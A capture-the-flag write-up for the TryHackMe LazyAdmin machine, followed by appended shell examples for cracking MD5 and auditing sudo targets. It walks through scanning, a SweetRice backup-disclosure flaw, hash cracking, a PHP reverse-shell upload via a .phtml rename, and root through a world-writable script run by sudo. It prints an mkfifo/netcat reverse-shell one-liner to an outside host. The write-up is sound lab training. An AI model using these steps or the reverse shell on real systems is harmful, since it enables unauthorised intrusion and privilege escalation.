LazyAdmin — TryHackMe Writeup
Target IP: 10.10.204.37
In this write-up, we’ll go through the steps to exploit the LazyAdmin machine from TryHackMe. This includes scanning, enumeration, exploitation, and privilege escalation, leading to the capture of both user and root flags.
Let’s get started! 🚀
0. Scanning
We begin by scanning the target machine for open ports using nmap:
❯ nmap -sV -Pn 10.10.204.37 -v
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-11 16:46 +0545
........
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The server is running Linux with SSH and Apache web services exposed.
1. Enumeration
Exploring Port 80
Navigating to http://10.10.204.37/, we find the default Apache page. Using gobuster for directory enumeration reveals a hidden /content directory.
❯ gobuster dir -u http://10.10.204.37/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.204.37/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/content (Status: 301) [Size: 314] [--> http://10.10.204.37/content/]
.....
Visiting /content reveals the SweetRice CMS.
CMS Exploit
Searching for known vulnerabilities in SweetRice (version 1.5.1), we find a backup disclosure exploit:
Title: SweetRice 1.5.1 - Backup Disclosure
Application: SweetRice
Versions Affected: 1.5.1
Vendor URL: http://www.basic-cms.org/
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
Date: 16-Sept-2016
Proof of Concept :
You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
and can access to website files backup from:
http://localhost/SweetRice-transfer.zip
Browsing to the mysql_backup directory under /content/inc, we find a MySQL backup file that can be downloaded. On line 79 of that file we find what we need for now: the admin user name and its password as an MD5 hash.
Using john to crack the hash reveals the password: Passw******
john --format=raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt password.hash
username: ma*****
password hash: 42f749ade7f9e195bf475f**********
password: Passw******
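As an added example (not part of the original write-up), the shell snippet below does by hand what the john command above does for raw MD5: it hashes each candidate word and compares it with the target, then verifies the recovered password against the hash, a check worth running before using the credentials on the login page. The hash and wordlist are constructed for the demo (the MD5 of "password"); the real hash is redacted above and is not reproduced here.

```shell
#!/bin/sh
# Added example, not code from the LazyAdmin write-up: a minimal raw-MD5
# dictionary attack plus a verification step. The hash and wordlist are
# CONSTRUCTED for the demo (md5("password")); the real hash is redacted above.

# md5_hex STRING -> hex MD5 of STRING (printf '%s' avoids hashing a newline)
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# crack_md5 HASH WORDLIST -> prints the first matching word and returns 0,
# or prints nothing and returns 1 when no candidate matches.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if [ "$(md5_hex "$candidate")" = "$target" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$2"
    return 1
}

# verify_crack HASH PASSWORD -> 0 if PASSWORD really hashes to HASH.
# Run this on john's output before trying the password on the admin panel.
verify_crack() {
    [ "$(md5_hex "$2")" = "$(printf '%s' "$1" | tr 'A-F' 'a-f')" ]
}

# Constructed sample input: a four-word stand-in for rockyou.txt.
DEMO_HASH='5f4dcc3b5aa765d61d8327deb882cf99'   # md5("password")
DEMO_WORDLIST=$(mktemp)
printf '%s\n' 123456 letmein password qwerty > "$DEMO_WORDLIST"

# Usage: same shape as `john --format=raw-MD5 --wordlist=... password.hash`
crack_md5 "$DEMO_HASH" "$DEMO_WORDLIST"
```

The point of verify_crack is that john's "cracked" line can come from a stale john.pot entry for a different hash; re-hashing the candidate yourself rules that out. With the real 14-million-line rockyou.txt, use john (or hashcat) for speed; this loop is only meant to make the comparison visible.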
2. Exploitation
Just as `/content/inc` exists, other subdirectories may too, so running directory enumeration against `/content` as well turns up the `as` directory. This is the SweetRice admin login page.
We logged in to the admin panel with the cracked credentials and found the Media Center, which allows file uploads. I used it to upload the PHP reverse shell provided by pentestmonkey, with the IP address changed to my attacker machine and the port set to 1234. The upload may be rejected with a .php extension; renaming the file to .phtml got it uploaded, and the server still executes it as PHP.
3. Gaining Access
Now set up a netcat listener on port `1234` on the attacker machine. Requesting the uploaded file on the server executes it, and we receive the connection:
❯ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.204.37 37452
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
14:57:51 up 57 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
The shell runs as www-data. Looking in /home we find the user itguy, and user.txt is readable, which gives us the user flag:
$ ls /home
itguy
$ ls /home/itguy
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat /home/itguy/user.txt
THM{63e5bce9271952aad1**************}
4. Privilege Escalation
Using sudo -l, we discover that the www-data user can execute a specific Perl script (/home/itguy/backup.pl) with root privileges and without a password.
$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Examining backup.pl, it simply runs /etc/copy.sh through sh, and that file is world-writable (mode -rw-r--rwx), so any user on the box can change what root executes:
$ cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
$ ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
copy.sh already contains a reverse shell pointing at 192.168.0.190:5554, which is not our address. One option is to change that IP to the attacker machine, start a listener on port 5554, and run the sudo command; the shell connects back as root. The simpler option is to overwrite /etc/copy.sh with a command that spawns a shell directly, since the sudo rule runs it as root:
$ echo "/bin/bash" > /etc/copy.sh
$ sudo /usr/bin/perl /home/itguy/backup.pl
whoami
root
cat /root/root.txt
THM{6637f41d0177b6f37cb20d**********}
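To turn this into a reusable check, here is an added example (not from the write-up) that audits a sudo target the way we did by hand: it reads the script for absolute paths and reports any file, including the target itself, that group or world can write. It rebuilds the backup.pl/copy.sh layout in a temporary directory with the mode seen on the box, so the paths and file names are constructed and not the real /home/itguy/backup.pl or /etc/copy.sh.

```shell
#!/bin/sh
# Added example, not code from the write-up: audit a sudo target for the
# pattern exploited above -- a script run as root that hands control to a
# file writable by group or world. The layout is rebuilt in a temporary
# directory (CONSTRUCTED; not the real /home/itguy/backup.pl or /etc/copy.sh).

# writable_by_others PATH -> 0 if the group or other write bit is set.
# Parses `ls -ld` (-rw-r--rwx: group write is column 6, other write is column 9).
writable_by_others() {
    perms=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    [ -n "$perms" ] || return 1
    case "$perms" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# audit_sudo_target SCRIPT -> prints the script itself and every absolute path
# referenced inside it that is writable by others; returns 1 if any were found.
# The grep is a heuristic: literal paths only, not ones assembled at runtime.
audit_sudo_target() {
    found=0
    if writable_by_others "$1"; then
        printf 'WRITABLE target: %s\n' "$1"
        found=1
    fi
    for dep in $(grep -o '/[A-Za-z0-9_./-]*' "$1" | sort -u); do
        [ -f "$dep" ] || continue
        if writable_by_others "$dep"; then
            printf 'WRITABLE dependency: %s (called from %s)\n' "$dep" "$1"
            found=1
        fi
    done
    return $found
}

# Constructed replica of the box: backup.pl calls copy.sh, copy.sh is -rw-r--rwx.
DEMO=$(mktemp -d)
cat > "$DEMO/backup.pl" <<EOF
#!/usr/bin/perl
system("sh", "$DEMO/copy.sh");
EOF
printf '%s\n' 'echo backup placeholder' > "$DEMO/copy.sh"
chmod 644 "$DEMO/backup.pl"
chmod 647 "$DEMO/copy.sh"

audit_sudo_target "$DEMO/backup.pl" || echo "-> privilege escalation path found"

# The fix applied to the replica (on the real box also chown root:root):
chmod 755 "$DEMO/copy.sh"
audit_sudo_target "$DEMO/backup.pl" && echo "-> clean"
```

On the real box the fix is `chown root:root /etc/copy.sh && chmod 755 /etc/copy.sh`, and ideally moving backup.pl out of itguy's home so that the sudo target itself is not under a non-root user's control. The path match is a heuristic and will miss paths assembled at runtime, so it complements reading the script rather than replacing it.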
This machine highlights the importance of securing:
- Web directories (e.g., /inc/mysql_backup): CMS backups must not be served from the web root, since the database dump handed us the admin hash.
- Permissions on scripts and files: a script that root runs via sudo must not depend on a world-writable file, and the sudo rule should not point into a non-root user's home directory.
Security needs to be designed in from the start rather than patched on afterwards.
Happy Hacking!